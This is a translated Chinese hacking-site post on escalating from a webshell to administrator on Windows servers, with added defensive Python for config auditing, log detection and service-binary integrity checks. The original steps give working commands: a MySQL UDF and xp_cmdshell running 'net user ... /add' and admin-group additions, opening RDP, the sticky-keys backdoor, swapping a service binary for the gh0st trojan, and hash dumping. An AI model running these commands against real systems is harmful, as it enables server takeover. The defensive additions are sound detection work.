The multi-mode Server-bug warning-the black bar safety net

2010-05-04T00:00:00
ID MYHACK58:62201026841
Type myhack58
Reporter Anonymous (佚名)
Modified 2010-05-04T00:00:00

Description

  1. Find the configuration file: read the web site directory for config.asp, config.php, conn.asp and the inc directory, and look for a high-privilege account and password, for example the root password or the SA password.

// [CH] Modify the following variables according to the account parameters provided by your hosting space; if you have any questions, please contact your server provider
$dbhost = 'localhost'; // Database server
$dbuser = 'root'; // Database user name
$dbpw = '123'; // Database password
$dbname = 'discuz'; // Database name
$pconnect = 0; // Database persistent connection 0=off, 1=on

This gives the root account and its password: root / 123
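The step above works because web application configs routinely hold the database superuser's credentials in clear text. The following is an added example, not code from the original post: a defender-side audit that walks a web root for the config file names named above, extracts credentials from PHP-style assignments and from ADO/ODBC connection strings, and flags privileged accounts (root, sa) and weak passwords. The file-name list, the weak-password list and the sample inputs are constructed for this example.

```python
import os
import re
from dataclasses import dataclass

# Config file names the write-up says to look for (constructed list for this example).
CONFIG_NAMES = {"config.asp", "config.php", "conn.asp", "conn.php", "inc.php"}
# Database accounts that should never back a web application.
PRIVILEGED_ACCOUNTS = {"root", "sa"}
# Constructed sample of weak passwords; a real audit would use a larger list.
COMMON_PASSWORDS = {"", "123", "123456", "password", "admin", "root", "sa"}

USER_KEYS = {"dbuser", "user", "username", "uid", "user id"}
PASS_KEYS = {"dbpw", "dbpass", "dbpassword", "password", "pwd"}

# PHP style:  $dbuser = 'root';
PHP_ASSIGN = re.compile(r"\$(\w+)\s*=\s*(['\"])(.*?)\2\s*;")
# ADO/ODBC connection string style:  UID=sa;PWD=123;
CONN_KV = re.compile(r"(?i)\b(uid|user id|pwd|password|user)\s*=\s*([^;\"']*)")


@dataclass
class Finding:
    path: str
    kind: str     # "privileged-account" or "weak-password"
    detail: str


def extract_credentials(text):
    """Return (users, passwords) found in PHP assignments or connection strings."""
    users, passwords = [], []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("$"):
            for key, _, value in PHP_ASSIGN.findall(stripped):
                if key.lower() in USER_KEYS:
                    users.append(value)
                elif key.lower() in PASS_KEYS:
                    passwords.append(value)
        elif "=" in stripped:
            for key, value in CONN_KV.findall(stripped):
                (users if key.lower() in USER_KEYS else passwords).append(value.strip())
    return users, passwords


def is_weak(password):
    """Short, all-digit, or dictionary passwords count as weak."""
    return len(password) < 8 or password.isdigit() or password.lower() in COMMON_PASSWORDS


def audit_text(text, path="<inline>"):
    """Audit one config file's contents; returns a list of Finding (passwords are masked)."""
    findings = []
    users, passwords = extract_credentials(text)
    for user in users:
        if user.lower() in PRIVILEGED_ACCOUNTS:
            findings.append(Finding(path, "privileged-account", user))
    for pw in passwords:
        if is_weak(pw):
            findings.append(Finding(path, "weak-password", "*" * len(pw) or "<empty>"))
    return findings


def audit_tree(root):
    """Walk a web root and audit every file whose name is in CONFIG_NAMES."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower() in CONFIG_NAMES:
                full = os.path.join(dirpath, name)
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    findings.extend(audit_text(fh.read(), full))
    return findings


# Constructed samples: a Discuz-style config and an SA connection string like the ones quoted above.
SAMPLE_CONFIG = """\
$dbhost = 'localhost'; // Database server
$dbuser = 'root'; // Database user name
$dbpw = '123'; // Database password
$dbname = 'discuz'; // Database name
"""
SAMPLE_CONN = "server=localhost;UID=sa;PWD=123;database=master;Provider=SQLOLEDB"

if __name__ == "__main__":
    for f in audit_text(SAMPLE_CONFIG, "config.php") + audit_text(SAMPLE_CONN, "conn.asp"):
        print(f"{f.path}: {f.kind} ({f.detail})")
```

Run `audit_tree("/var/www")` (or the IIS web root) from a scheduled job; any `privileged-account` finding means the application should be moved to a dedicated, least-privilege database login, which removes the precondition for both escalation paths described next.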

Privilege escalation using MySQL root

DLL successfully exported to c:\windows\system32\mysqlDll_1269695183.dll  Function 'state' already exists

select state("net user yhsafe yhsafe /add")

The SQL statement executed successfully: Resource id #2

Array ( [0] => command completed successfully.
succeed!
[state("net user yhsafe yhsafe /add")] => command completed successfully.
succeed!
)

Privilege escalation using SA

server=localhost;UID=sa;PWD=123;database=master;Provider=SQLOLEDB

Execute xp_cmdshell; if it is not available, remember to restore xp_cmdshell first.

Exec master.dbo.xp_cmdshell 'net user yhsafe.com yhsafe /add'
Exec master.dbo.xp_cmdshell 'net localgroup administrators yhsafe.com /add'

Open 3389: Exec master.dbo.xp_cmdshell 'C:\inetpub\wwwroot\bbs\3389.exe 3389'

Returned result: Now opening terminate service...success! 5.2 OK...

Opened successfully
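Both database paths above leave a distinctive trail: a UDF loaded with CREATE FUNCTION ... SONAME on MySQL, xp_cmdshell being re-enabled and then executed on SQL Server, and in either case `net user ... /add` and `net localgroup administrators ... /add` issued from the database process. As an added example (not part of the original post), the rule set below runs over query-log lines and reports each hit with a severity; the log lines, the log formats and the rule list are constructed for the demonstration and would need adjusting to a real general-log or SQL trace layout.

```python
import re
from collections import Counter

# Detection rules for the escalation chain described above: UDF loading on MySQL,
# xp_cmdshell on SQL Server, and OS account creation through either.
# Constructed rule set for this example.
RULES = [
    ("mysql-udf-load", "high",
     re.compile(r"create\s+function\s+\w+\s+returns\s+\w+\s+soname", re.I)),
    ("mssql-xp_cmdshell-enable", "high",
     re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("mssql-xp_cmdshell-exec", "high",
     re.compile(r"xp_cmdshell\s+'", re.I)),
    ("os-user-add", "critical",
     re.compile(r"net\s+user\s+\S+\s+\S+\s+/add", re.I)),
    ("os-admin-group-add", "critical",
     re.compile(r"net\s+localgroup\s+administrators\s+\S+\s+/add", re.I)),
]

SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2, "critical": 3}


def scan_lines(lines):
    """Return a list of (line_number, rule_name, severity) for every rule that matches a line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for name, severity, pattern in RULES:
            if pattern.search(line):
                hits.append((number, name, severity))
    return hits


def summarize(hits):
    """Aggregate hits into (highest_severity, Counter of rule names); 'none' when nothing matched."""
    if not hits:
        return "none", Counter()
    highest = max((h[2] for h in hits), key=SEVERITY_RANK.__getitem__)
    return highest, Counter(h[1] for h in hits)


# Constructed sample: three MySQL general-log lines followed by three SQL Server trace lines.
SAMPLE_LOG = [
    "100504 10:12:01   12 Query  SELECT * FROM cdb_members WHERE uid=1",
    "100504 10:12:09   12 Query  CREATE FUNCTION state RETURNS STRING SONAME 'mysqlDll_1269695183.dll'",
    "100504 10:12:15   12 Query  SELECT state(\"net user yhsafe yhsafe /add\")",
    "spid55 EXEC sp_configure 'xp_cmdshell', 1",
    "spid55 Exec master.dbo.xp_cmdshell 'net localgroup administrators yhsafe.com /add'",
    "spid56 SELECT name FROM sys.databases",
]

if __name__ == "__main__":
    found = scan_lines(SAMPLE_LOG)
    for number, name, severity in found:
        print(f"line {number}: {name} [{severity}]")
    print("highest severity:", summarize(found)[0])
```

The rules only fire on text the database server itself logged, so the general query log (MySQL) or a server-side trace / extended events session (SQL Server) has to be enabled for them to see anything; pairing the `os-user-add` rule with Windows event 4720 (user account created) gives a second, independent signal.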

  2. Use a software configuration vulnerability, or a local overflow, to escalate privileges.

"Brazilian barbecue" privilege escalation:

Run under the webshell: ch.exe "net user 123 123 /add"

360 privilege escalation:

360.exe 3389 // this opens Remote Desktop

Press Shift five times to pop up CMD

  3. Service replacement method

C:\ftp\FtpServer.exe

Rename FtpServer.exe to FtpServer1.exe

Upload a reverse-connecting remote control program, for example gh0st

Rename gh0st to FtpServer.exe
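The replacement trick above relies on nobody checking what the service actually executes after it is (re)started. The following is an added example, not code from the original post: a baseline-and-compare check that hashes every file in a service's directory at install time and later reports binaries that were modified, removed or added, treating a new file whose hash equals a baselined binary as "the original moved aside" (the FtpServer1.exe case). The directory layout and file contents in the sample are constructed; `snapshot_dir` is the only part that touches the real filesystem.

```python
import hashlib
import os


def sha256_bytes(data):
    """Hex SHA-256 of a byte string."""
    return hashlib.sha256(data).hexdigest()


def snapshot_dir(directory):
    """Read every regular file in a service directory (non-recursive) into {name: bytes}."""
    out = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                out[name] = fh.read()
    return out


def build_baseline(snapshot):
    """Turn a {name: bytes} snapshot into a {name: sha256} baseline to store off-host."""
    return {name: sha256_bytes(data) for name, data in snapshot.items()}


def compare(baseline, snapshot):
    """Return a list of (event, description) describing deviations from the baseline.

    Events: "modified" (same name, different content), "missing" (baselined file gone),
    "renamed-original" (new name, but content matches a baselined file), "new" (unknown file).
    """
    events = []
    current = build_baseline(snapshot)
    for name, digest in baseline.items():
        if name not in current:
            events.append(("missing", name))
        elif current[name] != digest:
            events.append(("modified", name))
    for name, digest in current.items():
        if name in baseline:
            continue
        original = next((n for n, d in baseline.items() if d == digest), None)
        if original:
            events.append(("renamed-original", f"{name} (was {original})"))
        else:
            events.append(("new", name))
    return events


# Constructed sample: the service directory at install time and after a swap like the one above.
INSTALL_SNAPSHOT = {"FtpServer.exe": b"\x4d\x5a original ftp server image", "readme.txt": b"docs"}
LATER_SNAPSHOT = {
    "FtpServer.exe": b"\x4d\x5a something else entirely",      # replacement now carries the service name
    "FtpServer1.exe": b"\x4d\x5a original ftp server image",   # original moved aside
    "readme.txt": b"docs",
}

if __name__ == "__main__":
    baseline = build_baseline(INSTALL_SNAPSHOT)
    for event, what in compare(baseline, LATER_SNAPSHOT):
        print(f"{event}: {what}")
```

In practice the baseline is taken with `build_baseline(snapshot_dir(r"C:\ftp"))` right after installation and kept somewhere the web server account cannot write; the check is then `compare(stored_baseline, snapshot_dir(r"C:\ftp"))` on a schedule. A "modified" event on the service binary together with a "renamed-original" sibling is exactly the pattern this section describes.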

  4. Break the routine: sniff with a webshell

The entire server's FTP and HTTP passwords can be sniffed.

A professional tool such as Wireshark is needed to view the passwords.

  5. Dump passwords

Dumping requires administrator or even SYSTEM privileges.

Dump the hashes and use them to penetrate further into the internal network.